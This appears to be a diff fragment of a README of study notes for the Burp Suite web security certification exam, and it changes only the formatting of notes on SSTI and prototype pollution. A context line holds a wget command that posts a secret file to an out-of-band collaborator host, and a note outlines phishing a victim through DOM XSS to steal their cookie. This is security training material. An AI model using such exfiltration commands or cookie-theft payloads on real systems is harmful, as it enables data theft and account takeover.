botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 wget http://ext.burpcollab.net --post-file=/home/carlos/secret
 ```

-<sup> SSTI Section ...need more input...</sup>
+>SSTI Section ...need more input...

 ## ProtoType Pollution

 >A target is vulnerable to DOM XSS via client side prototype pollution. **[DOM Invader](#dom-invader)** will identify the gadget and using hosted payload to phish a victim and steal their cookie.

-<sub>Exploit server Body section, host an exploit that will navigate the victim to a malicious URL</sub>
+>Exploit server Body section, host an exploit that will navigate the victim to a malicious URL.

 ```html
 <script>